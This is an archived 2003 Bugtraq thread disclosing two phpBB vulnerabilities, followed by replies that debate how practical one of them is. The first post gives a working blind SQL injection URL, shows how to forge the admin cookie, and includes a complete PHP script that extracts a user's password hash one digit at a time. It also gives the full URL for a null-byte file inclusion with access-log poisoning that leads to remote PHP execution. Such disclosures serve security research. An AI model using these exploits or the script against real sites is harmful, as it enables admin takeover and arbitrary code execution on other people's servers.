91210 2003-02-21 02:38 /187 rader/ Lucas Armstrong <lucas@cgishield.com>
Importerad: 2003-02-21 02:38 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3586>
Ärende: phpBB Security Bugs
------------------------------------------------------------
phpBB Security Bugs 2-18-2003
http://CGIshield.com
Security Issue in phpBB 2.0,2.01, 2.02 (Fixed in 2.03)
phpBB, the most popular open source bulletin board software on the
net, is vulnerable to a remotely exploitable SQL injection bug which
allows stealing an administrator's password hash. With the hash, an
attacker may login and gain complete control of the administrative
side of the system.
The actual attack carried out via a select fish attack, by
manipulating the select query in the page_header.php file in order
to return users online based on certain criteria, such as characters
of their password hash.
For example, if the user is attemping to hack a user_id of '40' he
will request the following page:
http://site/phpBB/index.php?forum_id=1+or+user_id=40+and+mid
(user_password,1,1)=char(97)/*
The resultant query will be:
SELECT u.username, u.user_id, u.user_allow_viewonline, u.user_level,
s.session_logged_in, s.session_ip FROM phpbb_users u, phpbb_sessions s
WHERE u.user_id = s.session_user_id AND s.session_time >= 1035778374 AND
s.session_page = 1 or user_id=40 and mid(user_password,1,1)=char(97)/*
ORDER BY u.username ASC, s.session_ip ASC
If a correct password hash digit is guessed, the admin's name will
show up as an online user, in the online user list at the bottom of
the forum page. After the password hash is determined, it is then
placed in the cookie and access is granted to the site.
So if the user_id is 32360 and the password hash is
6a204bd89f3c8348afd5c77c717a097a, then an attacker would take the
following value:
a:2:
{s:11:"autologinid";s:32:"6a204bd89f3c8348afd5c77c717a097a";s:6:"userid";s:
5:"31360";} www.phpbb.com/ 1536 1063947136 29596959 197425936 29523534 *
urlencode() it, and place it in a cookie with the variable name
'phpbb2support_data', then access would be gained to the admin panel
on any phpbb site.
One could use a script to speed the process of exploiting this
vulnerability. Something similar to the script at the end of this
document.
Security issue in PHPbb 1.4.x
PHPbb, the most popular open source bulletin board software on the
net, is vulnerable to a remotely exploitable file manipulation
attack, which may allow an attacker to execute arbitrary php code on
the system.
It involves the following code which is located in auth.php:
include('language/lang_'.$default_lang.'.'.$phpEx);
This code strips all slashes from incoming user data, thereby
unescaping any user inputed NULL bytes. An attacker can then supply
a null byte ('% 00' when urlencoded) , and any characters which come
after the null byte arent treated as part of the file name. This is
because when the PHP interpreter reads the file name, it will stop
at the first null byte.
In this particular situation, the ability to poison the filename is
significant, because a user may then load any file on the system into
the interpreter and have PHP execute it. For example, if a user
selects a language of value:
'/../../../var/logs/apache/access.log%00' ,
The apache access.log will be included by this attack.
This flaw can be exploited by registering an account, logging in, and
then calling the following url. (replace user=admin with the
registered name, and passwd=asdfasdf with corresponding password):
http://localhost/phpBB/prefs.php?HTTP_POST_VARS[save]
=1&passwd=asdfasdf&viewemail=0&savecookie=0&sig=0&smile=0&dishtml=0&disbbco
de=0&themes=1&lang=/../../../var/logs/apache/access.log%
00&save=1&user=admin&submit=Save%20Preferences
What good is the ability to execute any file on the target server?
Well consider if the attacker calls the url:
http://sitename.com/phpbb/index.php<?phpinfo();?>
The PHP command is stored in the apache access.log file, and then
executed by the include() function, thereby allowing an attacker to
execute arbitrary PHP on any target server.
PHPbb responded: " As for the 1.4.4 bug, we won't fix that. We've
said time and again that there are many security flaws in 1.4.4 and
that any sane webmaster should upgrade to 2.x. Please don't bother
searching for or notifying us of phpBB 1.x bugs."
<?php
########## PHPBB 2.0,2.01,2.02 Auto-SelectFish Attacker
########## David@cgishield.com
// To use this program, simply upload it to a php enabled webserver,
and execute // If php times out before the whole password hash is
determined, // adjust the maximum script execution time in php.ini
// Also, replace following with correct values:
$server="192.168.1.100";
$script="/phpbb2/index.php";
$the_userid_to_hack="2";
// don't change this
$data_to_match="In total there are <b>0</b> users online";
$checkchar[0]="char(48)";
$checkchar[1]="char(49)";
$checkchar[2]="char(50)";
$checkchar[3]="char(51)";
$checkchar[4]="char(52)";
$checkchar[5]="char(53)";
$checkchar[6]="char(54)";
$checkchar[7]="char(55)";
$checkchar[8]="char(56)";
$checkchar[9]="char(57)";
$checkchar[a]="char(97)";
$checkchar[b]="char(98)";
$checkchar[c]="char(99)";
$checkchar[d]="char(100)";
$checkchar[e]="char(101)";
$checkchar[f]="char(102)";
for($i=1;$i<33;$i++){
reset($checkchar);
while (list($i2, $i2val) = @each($checkchar)){
$vars="forum_id=1+or+user_id=$the_userid_to_hack+and+mid
(user_password,$i,1)=$checkchar[$i2]/*";
$data=sendToHost("$server",'post',"$script","$vars");
if (eregi("$data_to_match","$data")){
//echo("<b>$i2</b>");
}
else{echo("<br>$i= $i2"); flush();break;}
}
}
function sendToHost($host,$method,$path,$data,$useragent=1)
{
$method = strtoupper($method);
$fp = fsockopen($host,80);
fputs($fp, "$method $path HTTP/1.1\n");
fputs($fp, "Host: $host\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
fputs($fp, "Content-length: " . strlen($data) . "\n");
if ($useragent)
fputs($fp, "User-Agent: Mozilla\n");
fputs($fp, "Connection: close\n\n");
if ($method == 'POST')
fputs($fp, $data);
while (!feof($fp))
$buf .= fgets($fp,128);
fclose($fp);
for($slow=0;$slow<100;$slow++){}
return $buf;
}
?>
Vulnerability discovered by: David Zentner, david@cgishield.com
http://CGIshield.com
(91210) /Lucas Armstrong <lucas@cgishield.com>/(Ombruten)
Kommentar i text 91338 av Konrad Rieck <kr@roqe.org>
91338 2003-02-22 00:15 /31 rader/ Konrad Rieck <kr@roqe.org>
Importerad: 2003-02-22 00:15 av Brevbäraren
Extern mottagare: Lucas Armstrong <lucas@cgishield.com>
Mottagare: Bugtraq (import) <3608>
Kommentar till text 91210 av Lucas Armstrong <lucas@cgishield.com>
Ärende: Re: phpBB Security Bugs
------------------------------------------------------------
Hi Lucas & List,
On Thu, 2003-02-20 at 21:37, Lucas Armstrong wrote:
> If a correct password hash digit is guessed, the admin's name will show up
> as an online user, in the online user list at the bottom of the forum
> page. After the password hash is determined, it is then placed in the
> cookie and access is granted to the site.
I am just wondering... You are talking about guessing a 33-digit
hexadecimal number?
Even if there are 1.000 admin passwords in the hash-space and you
succeed finding one after only searching 10% of space and you are
checking about 1.000.000 hashs per second. You won't finish until the
sun goes nova (which is rather impractical, especially for CPU-
cooling).
I believe this is a theoretical attack against phpBB 2.0, but maybe I
missed some magic in the way phpBB generates these password hashs,
acutally I haven't looked at the code.
Regards,
Konrad
--
Konrad Rieck <kr@roqe.org> --------------------------------------------+
Roqefellaz, http://www.roqe.org - PGP: http://www.roqe.org/keys/kr.pub |
Fingerprint: 5803 E58E D1BF 9A29 AFCA 51B3 A725 EA18 ABA7 A6A3 -------+
(91338) /Konrad Rieck <kr@roqe.org>/----------------
Bilaga (application/pgp-signature) i text 91339
91339 2003-02-22 00:15 /8 rader/ Konrad Rieck <kr@roqe.org>
Bilagans filnamn: "signature.asc"
Importerad: 2003-02-22 00:15 av Brevbäraren
Extern mottagare: Lucas Armstrong <lucas@cgishield.com>
Mottagare: Bugtraq (import) <3609>
Bilaga (text/plain) till text 91338
Ärende: Bilaga (signature.asc) till: Re: phpBB Security Bugs
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (SunOS)
iD8DBQA+Vf1HpyXqGKunpqMRAh1TAJ48vXc8N2Po090Mg4+bQv/lAH58ggCfXdJy
przfiz56MEEYme82SH609mQ=
=pl6H
-----END PGP SIGNATURE-----
(91339) /Konrad Rieck <kr@roqe.org>/----------------
91371 2003-02-23 20:59 /100 rader/ Lucas Armstrong <lucas@cgishield.com>
Importerad: 2003-02-23 20:59 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3617>
Ärende: Re: phpBB Security Bugs
------------------------------------------------------------
In-Reply-To: <1045822791.7155.11.camel@fluffy>
Konrad,
This particular SQL Injection technique makes it possible to isolate
each hex digit in the md5 hash, and allows you to guess that digit's
particular value. Each digit would be guessed in 16 tries or
less. Since there are 32 digits in an md5 hash, there would be a
maximum number of 512 guesses to determine any particular password
hash. Again, the key to this exploit is isolating the guess to one
digit at a time, then moving on to the next digit, not trying to
guess the entire 32 digit string in one fell swoop which would
indeed take an incredible amount of time.
-David
>Received: (qmail 7140 invoked from network); 21 Feb 2003 21:21:16 -0000
>Received: from outgoing2.securityfocus.com (HELO
outgoing.securityfocus.com) (205.206.231.26)
> by mail.securityfocus.com with SMTP; 21 Feb 2003 21:21:16 -0000
>Received: from lists.securityfocus.com (lists.securityfocus.com
[205.206.231.19])
> by outgoing.securityfocus.com (Postfix) with QMQP
> id C92968F312; Fri, 21 Feb 2003 14:08:51 -0700 (MST)
>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@securityfocus.com>
>List-Help: <mailto:bugtraq-help@securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Received: (qmail 28784 invoked from network); 21 Feb 2003 10:14:48 -0000
>Subject: Re: phpBB Security Bugs
>From: Konrad Rieck <kr@roqe.org>
>To: Lucas Armstrong <lucas@cgishield.com>
>In-Reply-To: <20030220203725.17263.qmail@www.securityfocus.com>
>References: <20030220203725.17263.qmail@www.securityfocus.com>
>Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="=-0ZL8FBpSXa43X82Mh7cZ"
>Organization: Roqefellaz
>Message-Id: <1045822791.7155.11.camel@fluffy>
>Mime-Version: 1.0
>X-Mailer: Ximian Evolution 1.2.2
>Date: 21 Feb 2003 11:19:52 +0100
>
>--=-0ZL8FBpSXa43X82Mh7cZ
>Content-Type: text/plain
>Content-Transfer-Encoding: quoted-printable
>
>Hi Lucas & List,=20
>
>On Thu, 2003-02-20 at 21:37, Lucas Armstrong wrote:
>> If a correct password hash digit is guessed, the admin's name will show
u=
>p=20
>> as an online user, in the online user list at the bottom of the forum=20
>> page. After the password hash is determined, it is then placed in the=20
>> cookie and access is granted to the site.
>
>I am just wondering... You are talking about guessing a 33-digit
>hexadecimal number?=20
>
>Even if there are 1.000 admin passwords in the hash-space and you
>succeed finding one after only searching 10% of space and you are
>checking about 1.000.000 hashs per second. You won't finish until the
>sun goes nova (which is rather impractical, especially for CPU-
>cooling).
>
>I believe this is a theoretical attack against phpBB 2.0, but maybe I
>missed some magic in the way phpBB generates these password hashs,
>acutally I haven't looked at the code.
>
>Regards,
>Konrad=20
>
>--=20
>Konrad Rieck <kr@roqe.org> --------------------------------------------+
>Roqefellaz, http://www.roqe.org - PGP: http://www.roqe.org/keys/kr.pub |
>Fingerprint: 5803 E58E D1BF 9A29 AFCA 51B3 A725 EA18 ABA7 A6A3 -------+
>
>
>
>--=-0ZL8FBpSXa43X82Mh7cZ
>Content-Type: application/pgp-signature; name=signature.asc
>Content-Description: This is a digitally signed message part
>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.2.1 (SunOS)
>
>iD8DBQA+Vf1HpyXqGKunpqMRAh1TAJ48vXc8N2Po090Mg4+bQv/lAH58ggCfXdJy
>przfiz56MEEYme82SH609mQ=
>=pl6H
>-----END PGP SIGNATURE-----
>
>--=-0ZL8FBpSXa43X82Mh7cZ--
>
>
(91371) /Lucas Armstrong <lucas@cgishield.com>/(Ombruten)